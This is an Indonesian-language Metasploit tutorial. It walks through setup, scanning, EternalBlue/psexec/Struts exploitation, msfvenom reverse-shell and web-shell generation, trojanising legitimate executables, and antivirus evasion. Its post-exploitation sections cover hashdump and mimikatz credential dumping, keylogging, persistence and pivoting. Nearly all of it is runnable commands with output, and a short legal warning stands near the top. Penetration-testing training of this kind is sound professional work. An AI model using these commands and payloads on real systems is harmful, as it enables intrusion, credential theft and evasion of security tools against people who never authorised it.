π Daftar Isi
1. Pengenalan Metasploit
Metasploit Framework adalah salah satu tools penetration testing paling populer dan powerful di dunia cybersecurity. Dikembangkan pertama kali oleh HD Moore pada tahun 2003 dan sekarang dimiliki oleh Rapid7, Metasploit menyediakan platform lengkap untuk melakukan penetration testing, vulnerability assessment, exploit development, dan security research.
Metasploit hadir dalam dua edisi utama: Metasploit Framework (open source, gratis) dan Metasploit Pro (komersial dengan fitur tambahan seperti GUI, automation, dan reporting). Untuk pembelajaran, Metasploit Framework sudah sangat memadai dan tersedia di hampir semua distribusi Linux, termasuk Kali Linux yang merupakan distro default untuk ethical hacking.
Mengapa Metasploit Penting?
| Keunggulan | Penjelasan |
|---|---|
| Database Exploit Terlengkap | 3.000+ exploits, 2.000+ auxiliary modules, dan 1.000+ payloads |
| Modular Architecture | Setiap fungsi terpisah dalam module β mudah dikembangkan dan disesuaikan |
| Multi-Platform | Mendukung target Windows, Linux, macOS, Android, IoT, dan banyak lagi |
| Community Terbesar | Komunitas terbesar di dunia untuk penetration testing β banyak dokumentasi dan tutorial |
| Automation | Resource scripts dan RC files untuk otomasi serangan kompleks |
| Integration | Terintegrasi dengan Nmap, Nessus, Burp Suite, dan banyak tools lainnya |
| Industri Standar | Digunakan oleh professional keamanan, red team, dan blue team di seluruh dunia |
β οΈ Peringatan Hukum
Metasploit adalah tools yang sangat powerful. Gunakan hanya pada sistem yang Anda miliki atau yang memiliki izin tertulis untuk testing. Penggunaan tanpa izin adalah kejahatan siber dan melanggar UU ITE di Indonesia.
Diagram: Alur Penetration Testing dengan Metasploit
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β PENETRATION TESTING WORKFLOW β β β β ββββββββββββ ββββββββββββ ββββββββββββ ββββββββββββ β β β 1. RECON ββββΆβ 2. SCAN ββββΆβ 3. EXPLOITββββΆβ 4. POST β β β β β β β β β β EXPLOIT β β β β β’ OSINT β β β’ Nmap β β β’ Search β β β’ Shell β β β β β’ Whois β β β’ db_nmapβ β β’ Use β β β’ Priv β β β β β’ DNS β β β’ Vuln β β β’ Set β β β’ Pivot β β β β β’ Email β β Scan β β β’ Exploitβ β β’ Dump β β β ββββββββββββ ββββββββββββ ββββββββββββ ββββββββββββ β β β β ββββββββββββ ββββββββββββ ββββββββββββ β β β 5. REPORTβ β 6. CLEANUPβ β 7. MITIGATE β β β β β β β β β β β’ Logs β β β’ Remove β β β’ Patch vuln β β β β’ Evidenceβ β shells β β β’ Harden config β β β β’ Report β β β’ Clean β β β’ Update policy β β ββββββββββββ β tracks β βββββββββββ β β ββββββββββββ β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
2. Arsitektur & Komponen Metasploit
Metasploit dibangun dengan arsitektur modular yang terdiri dari beberapa jenis komponen utama. Memahami arsitektur ini sangat penting untuk bisa menggunakan Metasploit secara efektif.
2.1 Jenis-Jenis Module
| Jenis Module | Fungsi | Contoh |
|---|---|---|
| Exploit | Menjalankan serangan terhadap target yang rentan | windows/smb/ms17_010_eternalblue |
| Payload | Kode yang dijalankan setelah exploit berhasil | windows/meterpreter/reverse_tcp |
| Auxiliary | Fungsi non-exploit: scanning, fuzzing, sniffing | scanner/smb/smb_version |
| Post | Modul post-exploitation setelah mendapat akses | windows/gather/enum_domain |
| Encoder | Meng-encode payload untuk menghindari deteksi AV | x86/shikata_ga_nai |
| NOP | No-operation generator untuk padding | x86/opty2 |
| Evasion | Teknik evasion untuk menghindari AV/EDR | windows/windows_defender_exe |
2.2 Tipe Payload
Diagram: Tipe Payload Metasploit
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β TIPE PAYLOAD β β β β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β β β SINGLES (Inline/Staged-less) β β β β β’ Payload lengkap dalam satu file β β β β β’ Tidak perlu koneksi kembali ke attacker β β β β β’ Ukuran lebih besar β β β β β’ Contoh: windows/shell_reverse_tcp β β β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β β β β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β β β STAGERS β β β β β’ Payload kecil yang membuat koneksi ke listener β β β β β’ Bertugas menerima stage payload β β β β β’ Contoh: windows/meterpreter/reverse_tcp β β β β β stager = reverse_tcp β β β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β β β β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β β β STAGES β β β β β’ Payload utama yang dikirim setelah stager β β β β β’ Lebih besar, dijalankan setelah koneksi β β β β β’ Contoh: windows/meterpreter/reverse_tcp β β β β β stage = meterpreter β β β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β β β β Flow: Stager β Koneksi ke listener β Menerima Stage β β β Stage dieksekusi β Session aktif β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
2.3 Meterpreter β Payload Premium
Meterpreter adalah payload advanced yang berjalan sepenuhnya di memory (fileless) dan menggunakan encrypted communication. Ini adalah payload paling populer di Metasploit karena fiturnya yang sangat lengkap:
| Fitur Meterpreter | Keterangan |
|---|---|
| In-Memory Execution | Berjalan sepenuhnya di memory β tidak menulis file ke disk |
| Encrypted Communication | Komunikasi terenkripsi TLS antara handler dan session |
| Dynamic Loading | Modul bisa di-load on-demand tanpa restart |
| Multi-Session | Satu exploit bisa menjalankan multiple Meterpreter sessions |
| Platform Agnostic | Tersedia untuk Windows, Linux, macOS, Android, Python |
| Migration | Bisa berpindah ke process lain untuk persistence |
| Stealth | Komunikasi terdeteksi lebih sulit dibanding shell biasa |
3. Instalasi & Setup
3.1 Instalasi di Kali Linux
Bash β Instalasi Metasploit di Kali Linux
# Kali Linux sudah termasuk Metasploit secara default # Jika belum terinstal: sudo apt update && sudo apt install metasploit-framework # Atau menggunakan installer resmi: curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall ./msfinstall # Initialize database (penting untuk fitur caching) sudo msfdb init # Cek status database sudo msfdb status # Start msfconsole msfconsole # Alternatif: start dengan specific database msfconsole -d "postgres://msf:password@localhost/msf"
3.2 Instalasi di Ubuntu/Debian
Bash β Instalasi di Ubuntu
# Install dependencies sudo apt update sudo apt install -y curl wget gnupg2 # Add Rapid7 repository curl -fsSL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > /tmp/msfinstall chmod +x /tmp/msfinstall sudo /tmp/msfinstall # Install PostgreSQL (recommended) sudo apt install -y postgresql postgresql-client # Start PostgreSQL sudo systemctl start postgresql sudo systemctl enable postgresql # Initialize Metasploit database sudo msfdb init # Verify installation msfconsole -q -x "version; exit"
3.3 Setup Database
Bash β Database Setup & Management
# ===== DATABASE MANAGEMENT ===== # Initialize database sudo msfdb init # Check database status sudo msfdb status # Start/restart database sudo msfdb start sudo msfdb restart # Delete and reinitialize database sudo msfdb delete sudo msfdb reinit # ===== INSIDE MSFCONSOLE ===== # Check database connection msf6 > db_status # Reconnect if disconnected msf6 > db_connect msf:password@localhost/msf # List workspaces (penting untuk organisasi) msf6 > workspace -a project_alpha # Buat workspace baru msf6 > workspace project_alpha # Switch workspace msf6 > workspace -l # List semua workspace # ===== MANAJEMEN DATA ===== # Tambah host ke database msf6 > db_add_host 192.168.1.100 # Tambah service msf6 > db_add_service -p 80 -s http -d "Apache/2.4" 192.168.1.100 # Tambah note msf6 > db_add_note -t vuln -n "Open redirect vuln" 192.168.1.100 # Export data msf6 > db_export -f xml /tmp/scan_results.xml msf6 > db_export -f pwdump /tmp/hashes.txt
4. Perintah Fundamental Metasploit
4.1 Navigasi & Bantuan
MSFConsole β Perintah Dasar
# ===== PERINTAH DASAR MSFCONSOLE ===== # Help dan dokumentasi msf6 > help # Tampilkan semua perintah msf6 > help# Help untuk perintah spesifik msf6 > show -h # Help untuk perintah show # ===== SEARCHING MODULE ===== # Cari module berdasarkan keyword msf6 > search eternalblue msf6 > search type:exploit platform:windows msf6 > search name:smb type:exploit msf6 > search cve:2017-0144 msf6 > search rank:excellent platform:linux # Search dengan output detail msf6 > search -o eternalblue # Output format tabel # ===== MENGGUNAKAN MODULE ===== # Pilih module msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(ms17_010_eternalblue) > # Lihat informasi module msf6 exploit(ms17_010_eternalblue) > info msf6 exploit(ms17_010_eternalblue) > show info # Lihat options yang perlu di-set msf6 exploit(ms17_010_eternalblue) > show options msf6 exploit(ms17_010_eternalblue) > show advanced # Lihat payload yang kompatibel msf6 exploit(ms17_010_eternalblue) > show payloads # ===== SET PARAMETERS ===== # Set target msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100 msf6 exploit(ms17_010_eternalblue) > set RPORT 445 # Set payload msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp # Set listener (LHOST = IP attacker) msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50 msf6 exploit(ms17_010_eternalblue) > set LPORT 4444 # Set target spesifik (jika multi-target) msf6 exploit(ms17_010_eternalblue) > show targets msf6 exploit(ms17_010_eternalblue) > set TARGET 0 # Set global (berlaku untuk semua module) msf6 > setg RHOSTS 192.168.1.100 # Unset parameter msf6 > unset RHOSTS msf6 > unsetg RHOSTS # Unset global # Reset semua options ke default msf6 > unset all # ===== MENJALANKAN EXPLOIT ===== # Jalankan exploit msf6 exploit(ms17_010_eternalblue) > exploit msf6 exploit(ms17_010_eternalblue) > run # Alias # Jalankan sebagai background job msf6 exploit(ms17_010_eternalblue) > exploit -j # Jalankan dengan check (hanya test, tidak exploit) msf6 exploit(ms17_010_eternalblue) > check
4.2 Session Management
MSFConsole β Session Management
# ===== SESSION MANAGEMENT ===== # List semua sessions aktif msf6 > sessions -l # Interact dengan session tertentu msf6 > sessions -i 1 # Background session (kembali ke msfconsole) meterpreter > background meterpreter > bg # atau dari msfconsole: msf6 > sessions -u 1 # Upgrade shell ke meterpreter # Kirim command ke session tanpa interact msf6 > sessions -c "sysinfo" -i 1 # Kill session msf6 > sessions -k 1 # Kill semua sessions msf6 > sessions -K # List sessions dengan info detail msf6 > sessions -v # ===== SESSION ROUTING ===== # Tambahkan route melalui session (pivot) # Ini memungkinkan akses ke subnet internal msf6 > route add 10.10.10.0/255.255.255.0 1 # Lihat routing table msf6 > route print # Auto-route melalui semua sessions msf6 > route add 10.10.10.0/255.255.255.0 -i 1 # ===== JOBS MANAGEMENT ===== # List background jobs msf6 > jobs -l # Kill job msf6 > jobs -k# List jobs dengan detail msf6 > jobs -v
5. Reconnaissance & Scanning
5.1 Nmap Integration
MSFConsole β Nmap Integration
# ===== NMAP LANGSUNG DARI MSFCONSOLE ===== # Basic scan β hasil otomatis masuk database msf6 > db_nmap -sV -sC -O 192.168.1.0/24 # Scan agresif dengan script default msf6 > db_nmap -A -T4 192.168.1.100 # UDP scan msf6 > db_nmap -sU --top-ports 100 192.168.1.100 # Service detection + version msf6 > db_nmap -sV --version-intensity 5 192.168.1.100 # Vulnerability scan scripts msf6 > db_nmap --script vuln 192.168.1.100 # Scan specific ports msf6 > db_nmap -p 21,22,80,443,445,3389 192.168.1.100 # ===== MENAMPILKAN HASIL SCAN ===== # Tampilkan hosts yang ditemukan msf6 > hosts # Tampilkan services yang ditemukan msf6 > services # Filter hosts berdasarkan OS msf6 > hosts -o windows # Filter services berdasarkan port msf6 > services -p 80 # Cari vulnerability yang ditemukan msf6 > vulns
5.2 Auxiliary Scanner Modules
MSFConsole β Auxiliary Scanners
# ===== AUXILIARY SCANNER ===== # Cari semua scanner modules msf6 > search type:auxiliary name:scanner # ----- Port Scanner ----- msf6 > use auxiliary/scanner/portscan/tcp msf6 auxiliary(tcp) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(tcp) > set THREADS 50 msf6 auxiliary(tcp) > run # ----- SMB Scanner ----- msf6 > use auxiliary/scanner/smb/smb_version msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(smb_version) > set THREADS 20 msf6 auxiliary(smb_version) > run # ----- HTTP Scanner ----- msf6 > use auxiliary/scanner/http/http_version msf6 auxiliary(http_version) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(http_version) > set RPORT 80 msf6 auxiliary(http_version) > run # ----- SSH Scanner ----- msf6 > use auxiliary/scanner/ssh/ssh_version msf6 auxiliary(ssh_version) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(ssh_version) > run # ----- FTP Scanner ----- msf6 > use auxiliary/scanner/ftp/ftp_version msf6 auxiliary(ftp_version) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(ftp_version) > run # ----- Directory Scanner ----- msf6 > use auxiliary/scanner/http/dir_scanner msf6 auxiliary(dir_scanner) > set RHOSTS 192.168.1.100 msf6 auxiliary(dir_scanner) > set DICTIONARY /usr/share/wordlists/dirb/common.txt msf6 auxiliary(dir_scanner) > run # ----- Vulnerability Scanner ----- msf6 > use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(smb_ms17_010) > run # ----- Brute Force ----- msf6 > use auxiliary/scanner/ssh/ssh_login msf6 auxiliary(ssh_login) > set RHOSTS 192.168.1.100 msf6 auxiliary(ssh_login) > set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt msf6 auxiliary(ssh_login) > set THREADS 10 msf6 auxiliary(ssh_login) > run
6. Payloads & Listeners
6.1 Jenis Payload dalam Metasploit
MSFConsole β Payload Types
# ===== CARI PAYLOAD ===== # Cari semua payload msf6 > search type:payload # Cari payload spesifik platform msf6 > search type:payload platform:windows msf6 > search type:payload platform:linux msf6 > search type:payload name:meterpreter msf6 > search type:payload name:reverse name:tcp # ===== PAYLOAD KATEGORI ===== # --- Windows Singles --- windows/shell_reverse_tcp # Simple reverse shell windows/shell_bind_tcp # Simple bind shell windows/exec # Execute command windows/download_exec # Download dan execute file # --- Windows Staged (Meterpreter) --- windows/meterpreter/reverse_tcp # Meterpreter reverse (x86) windows/meterpreter/reverse_https # Meterpreter reverse HTTPS (lebih stealth) windows/meterpreter/bind_tcp # Meterpreter bind TCP windows/x64/meterpreter/reverse_tcp # Meterpreter reverse (x64) # --- Linux Singles --- linux/x86/shell_reverse_tcp # Linux reverse shell (x86) linux/x64/shell_reverse_tcp # Linux reverse shell (x64) # --- Linux Staged (Meterpreter) --- linux/x86/meterpreter/reverse_tcp # Linux meterpreter (x86) linux/x64/meterpreter/reverse_tcp # Linux meterpreter (x64) # --- Multi-Platform --- python/meterpreter/reverse_tcp # Python-based (cross-platform) java/meterpreter/reverse_tcp # Java-based (cross-platform) php/meterpreter/reverse_tcp # PHP-based (web shells) # ===== LISTENERS ===== # Multi/Handler β Listener universal msf6 > use exploit/multi/handler msf6 exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(handler) > set LHOST 192.168.1.50 msf6 exploit(handler) > set LPORT 4444 msf6 exploit(handler) > exploit -j # Run as background job
6.2 Payload Generation dengan msfvenom
Bash β msfvenom Payload Generation
# ===== MSFVENOM β PAYLOAD GENERATOR =====
# List semua payloads
msfvenom -l payloads
# List semua formats
msfvenom -l formats
# List semua encoders
msfvenom -l encoders
# ===== PAYLOAD GENERATION =====
# --- Windows Reverse Shell (EXE) ---
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f exe -o shell.exe
# --- Windows Reverse Shell (DLL) ---
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f dll -o shell.dll
# --- Windows Reverse Shell (MSI) ---
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f msi -o shell.msi
# --- Linux ELF ---
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f elf -o shell.elf
# --- PHP Web Shell ---
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f raw -o shell.php
# --- ASP Web Shell ---
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f asp -o shell.asp
# --- JSP Web Shell ---
msfvenom -p java/jsp_shell_reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f raw -o shell.jsp
# --- Python Reverse Shell ---
msfvenom -p python/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f raw -o shell.py
# --- PowerShell ---
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f psh -o shell.ps1
# --- Shellcode (raw) ---
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f raw -o shellcode.bin
# --- C Format ---
msfvenom -p windows/shell_reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f c
# --- C# Format ---
msfvenom -p windows/shell_reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f csharp
# ===== DENGAN ENCODING =====
# Encode dengan shikata_ga_nai (populer tapi sudah terdeteksi)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-e x86/shikata_ga_nai -i 5 \
-f exe -o encoded_shell.exe
# Multiple encoders
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-e x86/shikata_ga_nai -i 3 \
-f exe -o multi_encoded.exe
# ===== DENGAN TEMPLATE =====
# Inject payload ke executable yang ada
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-x /path/to/putty.exe -k \
-f exe -o trojan_putty.exe
7. Exploitation
7.1 EternalBlue (MS17-010)
MSFConsole β EternalBlue Exploit
# ===== ETERNALBLUE β Contoh Eksploitasi ===== # 1. Scan target untuk MS17-010 msf6 > use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.100 msf6 auxiliary(smb_ms17_010) > run # Output: [+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010! # 2. Load exploit msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(ms17_010_eternalblue) > show targets # 3. Set options msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100 msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50 msf6 exploit(ms17_010_eternalblue) > set LPORT 4444 msf6 exploit(ms17_010_eternalblue) > set TARGET 0 # 4. Exploit! msf6 exploit(ms17_010_eternalblue) > exploit # [*] Started reverse TCP handler on 192.168.1.50:4444 # [*] Sending stage (200262 bytes) to 192.168.1.100 # [*] Meterpreter session 1 opened (192.168.1.50:4444 β 192.168.1.100:49152) meterpreter > sysinfo meterpreter > getuid meterpreter > hashdump
7.2 SMB Exploits
MSFConsole β SMB Exploits Lainnya
# ===== SMB LOGIN BRUTE FORCE ===== msf6 > use auxiliary/scanner/smb/smb_login msf6 auxiliary(smb_login) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(smb_login) > set SMBUser administrator msf6 auxiliary(smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt msf6 auxiliary(smb_login) > set THREADS 10 msf6 auxiliary(smb_login) > run # ===== PS EXEC β Remote Command Execution ===== msf6 > use exploit/windows/smb/psexec msf6 exploit(psexec) > set RHOSTS 192.168.1.100 msf6 exploit(psexec) > set SMBUser administrator msf6 exploit(psexec) > set SMBPass Password123 msf6 exploit(psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(psexec) > set LHOST 192.168.1.50 msf6 exploit(psexec) > run # ===== SMB SHARE SCANNER ===== msf6 > use auxiliary/scanner/smb/smb_enumshares msf6 auxiliary(smb_enumshares) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(smb_enumshares) > run # ===== SMB USER ENUM ===== msf6 > use auxiliary/scanner/smb/smb_enumusers msf6 auxiliary(smb_enumusers) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(smb_enumusers) > run
7.3 Web Application Exploits
MSFConsole β Web Application Exploits
# ===== APACHE STRUTS (CVE-2017-5638) ===== msf6 > use exploit/multi/http/struts2_content_type_ognl msf6 exploit(struts2_content_type_ognl) > set RHOSTS 192.168.1.100 msf6 exploit(struts2_content_type_ognl) > set RPORT 8080 msf6 exploit(struts2_content_type_ognl) > set TARGETURI /action msf6 exploit(struts2_content_type_ognl) > set PAYLOAD java/meterpreter/reverse_tcp msf6 exploit(struts2_content_type_ognl) > set LHOST 192.168.1.50 msf6 exploit(struts2_content_type_ognl) > run # ===== WORDPRESS SCANNER ===== msf6 > use auxiliary/scanner/http/wordpress_scanner msf6 auxiliary(wordpress_scanner) > set RHOSTS 192.168.1.100 msf6 auxiliary(wordpress_scanner) > run # ===== TOMCAT MANAGER LOGIN ===== msf6 > use auxiliary/scanner/http/tomcat_mgr_login msf6 auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.1.100 msf6 auxiliary(tomcat_mgr_login) > set RPORT 8080 msf6 auxiliary(tomcat_mgr_login) > run # ===== HTTP FILE UPLOAD ===== msf6 > use exploit/multi/http/tomcat_mgr_upload msf6 exploit(tomcat_mgr_upload) > set RHOSTS 192.168.1.100 msf6 exploit(tomcat_mgr_upload) > set RPORT 8080 msf6 exploit(tomcat_mgr_upload) > set HttpUsername tomcat msf6 exploit(tomcat_mgr_upload) > set HttpPassword tomcat msf6 exploit(tomcat_mgr_upload) > run
8. Post-Exploitation
Setelah berhasil mendapatkan akses (Meterpreter session), tahap selanjutnya adalah post-exploitation β yaitu memanfaatkan akses yang didapat untuk mengumpulkan informasi, meningkatkan hak akses, dan mempertahankan akses.
8.1 Meterpreter Commands
Meterpreter β Perintah Lengkap
# ===== SYSTEM INFORMATION ===== meterpreter > sysinfo # Informasi sistem meterpreter > getuid # User saat ini meterpreter > getpid # Process ID saat ini meterpreter > ps # List semua process meterpreter > env # Environment variables # ===== PRIVILEGE ESCALATION ===== meterpreter > getsystem # Coba escalate ke SYSTEM meterpreter > getsystem -t 1 # Teknik Named Pipe Impersonation meterpreter > getsystem -t 2 # Teknik Named Pipe (duplexer) # Cek privileges meterpreter > getprivs # ===== CREDENTIAL HARVESTING ===== # Dump password hashes (SAM database) meterpreter > hashdump # Dump credentials dari memory (mimikatz) meterpreter > load kiwi meterpreter > creds_all meterpreter > creds_msv meterpreter > creds_kerberos # Dump NTLM hashes meterpreter > kiwi_cmd lsadump::sam # ===== FILE SYSTEM ===== meterpreter > pwd # Current directory meterpreter > ls # List files meterpreter > cd C:\\Users # Change directory meterpreter > cat file.txt # Read file meterpreter > download file.txt # Download file meterpreter > upload shell.exe # Upload file meterpreter > mkdir newdir # Create directory meterpreter > rm file.txt # Delete file meterpreter > edit file.txt # Edit file (nano) # ===== PROCESS MANAGEMENT ===== meterpreter > migrate 1234 # Migrate ke process lain meterpreter > execute -f cmd.exe -i # Execute command meterpreter > kill 1234 # Kill process # ===== NETWORK ===== meterpreter > ipconfig # Network interfaces meterpreter > route # Routing table meterpreter > netstat # Network connections meterpreter > arp # ARP table meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.100 # Port forwarding meterpreter > portfwd list # List port forwards # ===== SCREENSHOT & KEYLOGGING ===== meterpreter > screenshot # Take screenshot meterpreter > screenshare # Live screen sharing meterpreter > keyscan_start # Start keylogger meterpreter > keyscan_dump # Dump keystrokes meterpreter > keyscan_stop # Stop keylogger # ===== PERSISTENCE ===== meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.50 # -U: Run on user login # -i: Check interval (seconds) # -p: Port # -r: IP listener # ===== POST MODULES ===== meterpreter > run post/windows/gather/enum_domain meterpreter > run post/windows/gather/smart_hashdump meterpreter > run post/multi/recon/local_exploit_suggester meterpreter > run post/linux/gather/enum_network meterpreter > run post/linux/gather/hashdump
8.2 Pivoting & Lateral Movement
MSFConsole β Pivoting
# ===== PIVOTING β Akses ke Jaringan Internal ===== # Scenario: Kamu punya akses ke server DMZ (192.168.1.100) # dan ingin mengakses jaringan internal (10.10.10.0/24) # 1. Dapatkan session meterpreter ke DMZ server # (menggunakan exploit seperti sebelumnya) # 2. Tambahkan route melalui session msf6 > route add 10.10.10.0/255.255.255.0 1 # 1 = session ID # 3. Verifikasi route msf6 > route print # 4. Gunakan SOCKS proxy untuk tools lain msf6 > use auxiliary/server/socks_proxy msf6 auxiliary(socks_proxy) > set SRVPORT 1080 msf6 auxiliary(socks_proxy) > set VERSION 5 msf6 auxiliary(socks_proxy) > run -j # 5. Di terminal lain, gunakan proxychains # Edit /etc/proxychains.conf: # socks5 127.0.0.1 1080 # Sekarang bisa scan internal network proxychains nmap -sT -Pn 10.10.10.0/24 # ===== AUTOROUTE ===== # Auto-route dari semua meterpreter sessions msf6 > use post/multi/manage/autoroute msf6 post(autoroute) > set SESSION 1 msf6 post(autoroute) > run # ===== PORT FORWARDING ===== # Dari meterpreter session: meterpreter > portfwd add -l 3389 -p 3389 -r 10.10.10.50 # Sekarang bisa RDP ke 10.10.10.50 melalui localhost:3389
9. Evasion & AV Bypass
Bash β Payload Evasion Techniques
# ===== ENCODING PAYLOAD =====
# 1. Single encoder (basic evasion)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-e x86/shikata_ga_nai -i 5 \
-f exe -o encoded.exe
# 2. Multiple encoders (stacking)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-e x86/add_sub -i 3 \
-f exe -o multi_encoded.exe
# 3. List available encoders
msfvenom -l encoders
# ===== EVASION MODULES =====
# Windows Defender evasion
msf6 > use evasion/windows/windows_defender_exe
msf6 evasion(windows_defender_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 evasion(windows_defender_exe) > set LHOST 192.168.1.50
msf6 evasion(windows_defender_exe) > run
# AppLocker evasion
msf6 > use evasion/windows/applocker_evasion
# ===== TECHNIQUE TIPS =====
# 1. Gunakan HTTPS payload (lebih stealth)
set PAYLOAD windows/x64/meterpreter/reverse_https
set LPORT 443 # Port yang umum
# 2. Gunakan custom template
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-x /path/to/legitimate.exe -k \
-f exe -o trojan.exe
# 3. Gunakan staging bypass (stageless)
set PAYLOAD windows/x64/meterpreter_reverse_tcp
# Perhatikan: underscore (_) bukan slash (/)
# 4. Compile dengan source code
# Generate C source, compile dengan MinGW
msfvenom -p windows/shell_reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 -f c > shell.c
x86_64-w64-mingw32-gcc shell.c -o shell.exe
10. Automation & Resource Scripts
Resource Script β Full Automation
# ===== RESOURCE SCRIPTS (.rc) ===== # Resource script mengotomasi urutan perintah Metasploit # --- Contoh: scan_and_exploit.rc --- # Simpan sebagai scan_and_exploit.rc # Setup workspace workspace -a automated_scan # Nmap scan db_nmap -sV -O --script vuln 192.168.1.0/24 # Set global options setg RHOSTS 192.168.1.0/24 # Try EternalBlue on all hosts use auxiliary/scanner/smb/smb_ms17_010 run # Exploit vulnerable hosts use exploit/windows/smb/ms17_010_eternalblue set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.50 set LPORT 4444 exploit -j # Wait for sessions sleep 10 # Post-exploitation sessions -l sessions -c "sysinfo" -i 1 sessions -c "getuid" -i 1 # Export results db_export -f xml /tmp/scan_results.xml # ===== JALANKAN RESOURCE SCRIPT ===== # Dari command line: msfconsole -r scan_and_exploit.rc # Dari msfconsole: msf6 > resource scan_and_exploit.rc # ===== WEB SERVER RESOURCE ===== # Menjalankan listener yang persistent # Simpan sebagai listener.rc: use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_https set LHOST 0.0.0.0 set LPORT 443 set ExitOnSession false exploit -j -z # Jalankan: msfconsole -r listener.rc # Listener akan tetap berjalan meskipun session datang
11. Quiz Pemahaman
Uji pemahaman Anda tentang Metasploit: